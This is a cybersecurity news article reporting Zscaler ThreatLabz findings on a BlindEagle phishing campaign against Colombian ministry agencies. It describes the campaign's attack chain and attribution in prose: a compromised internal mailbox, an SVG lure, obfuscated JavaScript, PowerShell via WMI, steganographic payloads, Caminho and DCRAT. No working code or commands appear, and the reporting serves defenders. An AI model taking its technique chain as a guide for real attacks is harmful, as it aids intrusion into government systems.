Colombian government institutions are facing a sophisticated multi-stage cyberattack campaign orchestrated by the BlindEagle threat group, which leveraged compromised internal email accounts, PowerShell scripts, and steganography to deploy remote access trojans on target systems, according to Zscaler ThreatLabz researchers.
The cybersecurity firm discovered the spear-phishing operation in early September 2025, revealing that BlindEagle targeted agencies under Colombia’s Ministry of Commerce, Industry, and Tourism (MCIT) using an email sent from a compromised account within the same organization.
This internal-to-internal approach enabled the attackers to bypass traditional email security controls including DMARC, DKIM, and SPF checks while exploiting institutional trust.
ThreatLabz analysis indicates that the phishing email from a legitimate Microsoft 365 server authorized by the organization’s SPF policy, and that all message trajectory headers appear authentic.
The attack demonstrates BlindEagle’s evolution from deploying single-malware campaigns to orchestrating complex, multi-layer attack chains involving the Caminho downloader and DCRAT remote access trojan.
Attack Methodology
The campaign began with a legal-themed phishing email impersonating Colombia’s judicial system, complete with fabricated case numbers and urgent demands for receipt confirmation.
The message contained an SVG image attachment that, when clicked, decoded a Base64-encoded HTML page mimicking an official Colombian judicial web portal.
Victims who interacted with the fraudulent portal automatically downloaded a JavaScript file that initiated a file-less attack sequence.
The malware executed three JavaScript code snippets using integer array deobfuscation techniques, with each stage reconstructing and launching subsequent payloads.
The third JavaScript stage introduced Unicode-based comments and complex string manipulation to evade detection before executing a PowerShell command via Windows Management Instrumentation.
The PowerShell script downloaded an image file from the Internet Archive containing a Base64-encoded payload hidden between specific markers labeled “BaseStart-” and “-BaseEnd.”
Specifically, it leverages Windows Management Instrumentation (WMI) to obtain a Win32_Process instance.
Using steganography to conceal malicious code, the script carved out the embedded assembly, decoded it, and dynamically loaded it as a .NET module using reflection techniques.
Malware Infrastructure
ThreatLabz identified the loaded assembly as Caminho, a downloader malware that first emerged in Brazilian cybercriminal marketplaces in May 2025.
Once downloaded, the script carves out a Base64-encoded payload embedded between two specific markers: BaseStart- and -BaseEnd.
Evidence suggests Portuguese-speaking developers created Caminho, as the malware’s primary method contains argument names like “caminho” (path) and “extençao” (extension) in Portuguese.
BlindEagle adopted Caminho early, using it to download DCRAT payloads from Discord content delivery networks.
The final-stage DCRAT malware employed process hollowing techniques, launching the legitimate MSBuild.exe utility and injecting malicious code directly into memory.
This AsyncRAT variant features AES-256 encrypted configurations and certificate-based command-and-control server authentication functionality absent from DCRAT’s original open-source codebase.
ThreatLabz discovered 24 hosts worldwide exposing certificates matching the DCRAT sample’s issuer, with infrastructure primarily hosted on Swedish IP addresses under ASN 42708 (GleSYS AB) a hosting provider historically favored by BlindEagle.
The group also utilized Dynamic DNS services from ydns.eu, consistent with previously documented operational patterns.
Researchers attributed the campaign to BlindEagle with medium confidence based on infrastructure preferences, Colombian targeting, legal-themed lures, extensive use of .NET malware, legitimate service abuse including Discord for payload hosting, and documented steganography techniques.
The attack highlights BlindEagle’s persistent focus on Colombian government entities and demonstrates the group’s adoption of sophisticated tools from underground marketplaces to enhance operational capabilities.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.